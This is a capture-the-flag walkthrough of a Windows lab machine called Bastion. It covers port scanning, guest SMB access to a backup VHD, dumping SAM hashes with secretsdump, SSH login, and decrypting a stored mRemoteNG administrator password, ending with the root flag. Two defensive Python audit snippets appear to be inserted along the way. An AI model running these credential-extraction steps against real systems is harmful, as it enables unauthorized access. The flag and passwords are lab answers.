Walkthrough
Gaining a Foothold
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -p- -A -Pn 10.129.136.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 13:17 EST
Warning: 10.129.136.29 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.136.29
Host is up (0.73s latency).
Not shown: 65492 closed tcp ports (conn-refused), 30 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-19T20:20:59+01:00
|_clock-skew: mean: -19m59s, deviation: 34m35s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-19T19:20:55
|_ start_date: 2024-01-19T18:11:25
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3808.35 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn 10.129.136.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 13:19 EST
Nmap scan report for 10.129.136.29
Host is up (0.47s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 63.98 seconds
SMB
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.129.136.29\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.136.29 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/WPE/Bastion]
└─$ smbclient \\\\10.129.136.29\\Backups
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1175684 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> cd ..
smb: \> pwd
Current directory is \\10.129.136.29\Backups\
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> mget *
Get file note.txt?
Get file SDT65CB.tmp?
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> dir
. Dn 0 Fri Feb 22 07:44:02 2019
.. Dn 0 Fri Feb 22 07:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1175684 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
Catalog Dn 0 Fri Feb 22 07:45:32 2019
MediaId An 16 Fri Feb 22 07:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1175684 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:02 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:44:03 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1175557 blocks available
Note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
Mount the machine's Backups share locally, then mount the VHD inside it read-only with guestmount (following the article linked above):
┌──(kali㉿kali)-[/mnt/remote]
└─$ sudo mount -t cifs -o 'rw,username=guest' //10.129.136.29/Backups /mnt/remote
Password for guest@//10.129.136.29/Backups:
sudo guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd -v
Copy SAM, SECURITY and SYSTEM from Windows\System32\config in the mounted image into the working directory.
Open a terminal as root and run secretsdump against the copied hives:
┌──(root㉿kali)-[/home/kali/WPE/Bastion]
└─# secretsdump.py -system SYSTEM -sam SAM -security SECURITY local
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
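The hash lines above are in pwdump format. As an added example (not from the walkthrough or from Impacket), here is a small stdlib-only parser that separates the accounts whose password actually leaked with the backup from those with a blank password, which is the triage a responder would do with a dumped SAM. The empty-hash constants are the well-known LM/NT hashes of the empty string; the sample input is copied from the output above.

```python
import re
from dataclasses import dataclass

# Well-known hashes of the empty password. An empty LM hash only means LM hashes are
# not stored (the default on modern Windows); an empty NT hash means the account has
# a blank password, so nothing usable leaked for it.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: the SAM lines from the secretsdump run above, with two progress lines.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
"""

# pwdump format: user:rid:lmhash:nthash:::
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")


@dataclass
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        return self.lm != EMPTY_LM


def parse_sam_dump(text: str) -> list:
    """Pick the pwdump-style lines out of a secretsdump transcript; other lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append(SamEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def triage(entries: list) -> dict:
    """Group accounts the way a responder reviewing a leaked backup would: whose password
    hash was exposed (rotate it), who had a blank password, whether weak LM hashes were
    stored, and whether the built-in Administrator (RID 500) is in the dump."""
    return {
        "rotate": [e.user for e in entries if not e.blank_password],
        "blank_password": [e.user for e in entries if e.blank_password],
        "lm_stored": [e.user for e in entries if e.lm_stored],
        "builtin_admin": [e.user for e in entries if e.rid == 500],
    }
```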
Credential > SSH
┌──(kali㉿kali)-[~]
└─$ ssh l4mpje@10.129.136.29
The authenticity of host '10.129.136.29 (10.129.136.29)' can't be established.
ED25519 key fingerprint is SHA256:2ZbIDKRPlngECX1WSMqnucdOWthIaPG7wQ6mBReac7M.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.136.29' (ED25519) to the list of known hosts.
l4mpje@10.129.136.29's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
https://github.com/haseebT/mRemoteNG-Decrypt
l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of c:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 14:03 <DIR> .
22-02-2019 14:03 <DIR> ..
22-02-2019 14:03 6.316 confCons.xml
22-02-2019 14:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 14:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 14:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 14:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 14:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 14:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 14:03 51 extApps.xml
22-02-2019 14:03 5.217 mRemoteNG.log
22-02-2019 14:03 2.245 pnlLayout.xml
22-02-2019 14:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.811.198.464 bytes free
l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false"
    Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA"
    ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
        Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain=""
        Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
        Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389"
        ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic"
        RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false"
        LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true"
        DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false"
        EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false"
        RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false"
        RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false"
        PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp=""
        VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC"
        VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername=""
        VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false"
        RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes"
        RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain=""
        InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false"
        InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false"
        InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false"
        InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false"
        InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false"
        InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false"
        InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false"
        InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false"
        InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false"
        InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false"
        InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false"
        InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false"
        InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false"
        InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false"
        InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false"
        InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false"
        InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false"
        InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
    <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
        Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain=""
        Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
        Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389"
        ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic"
        RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false"
        LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true"
        DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false"
        EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false"
        RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false"
        RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false"
        PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp=""
        VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC"
        VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername=""
        VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false"
        RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes"
        RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain=""
        InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false"
        InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false"
        InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false"
        InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false"
        InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false"
        InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false"
        InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false"
        InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false"
        InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false"
        InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false"
        InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false"
        InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false"
        InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false"
        InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false"
        InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false"
        InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false"
        InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false"
        InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
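As an added example (not part of the walkthrough or of the linked decrypt script), a stdlib-only Python audit of a confCons.xml like the one above: it inventories the stored connections, reads the file-level protection settings, and uses the ciphertext length of the Protected marker to tell whether the file still relies on mRemoteNG's built-in default master password. Assumptions: the blob layout (salt | nonce | ciphertext | tag, as the linked script reads it) and the two marker strings are mRemoteNG's known storage format; the sample file is a trimmed copy of the one shown above.

```python
import base64
import xml.etree.ElementTree as ET

# Trimmed copy of the confCons.xml shown above (constructed for this example: header
# attributes and Password blobs are the page's, the many Inherit*/display attributes are dropped).
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
  EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false"
  Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA"
  ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain="" Hostname="127.0.0.1"
    Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
    Protocol="RDP" Port="3389" />
  <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Domain="" Hostname="192.168.1.75"
    Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
    Protocol="RDP" Port="3389" />
</mrng:Connections>
"""

# mRemoteNG encrypts "ThisIsProtected" into Protected when a custom master password is set,
# and this marker when the built-in default applies (assumed from its known storage format).
PROTECTED_DEFAULT = "ThisIsNotProtected"


def blob_plaintext_len(b64: str) -> int:
    """Secret length inside a confCons blob: 16-byte PBKDF2 salt | 16-byte GCM nonce |
    ciphertext | 16-byte GCM tag. GCM is unpadded, so ciphertext length == plaintext length."""
    raw = base64.b64decode(b64)
    if len(raw) < 48:
        raise ValueError("blob shorter than salt + nonce + tag")
    return len(raw) - 48


def audit_confcons(xml_text: str) -> dict:
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    if root.get("FullFileEncryption", "false").lower() != "true":
        findings.append("FullFileEncryption=false: hostnames and usernames are stored in clear text")
    iters = int(root.get("KdfIterations", "1000"))
    if iters < 10000:
        findings.append(f"KdfIterations={iters}: each master-password guess is cheap to test")
    protected = root.get("Protected", "")
    if protected and blob_plaintext_len(protected) == len(PROTECTED_DEFAULT):
        findings.append("Protected marker length matches the default master password (no custom one set)")
    connections = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        pw = node.get("Password") or ""
        connections.append({
            "name": node.get("Name"), "username": node.get("Username"),
            "target": f"{node.get('Hostname')}:{node.get('Port')}/{node.get('Protocol')}",
            "password_len": blob_plaintext_len(pw) if pw else 0,  # length leaks even without the key
        })
    return {"engine": f"{root.get('EncryptionEngine')}-{root.get('BlockCipherMode')}",
            "kdf_iterations": iters, "findings": findings, "connections": connections}
```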
Escalating Privilege
┌──(kali㉿kali)-[/opt/mRemoteNG-Decrypt]
└─$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
When copying the Password value out of the wrapped `type` output, strip the line breaks the terminal inserted first.
SSH in as Administrator with the recovered password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\Administrator\Desktop
23-02-2019 09:40 <DIR> .
23-02-2019 09:40 <DIR> ..
19-01-2024 19:12 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4.811.132.928 bytes free
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
5bb71734a3a10e20b395ad114232c71e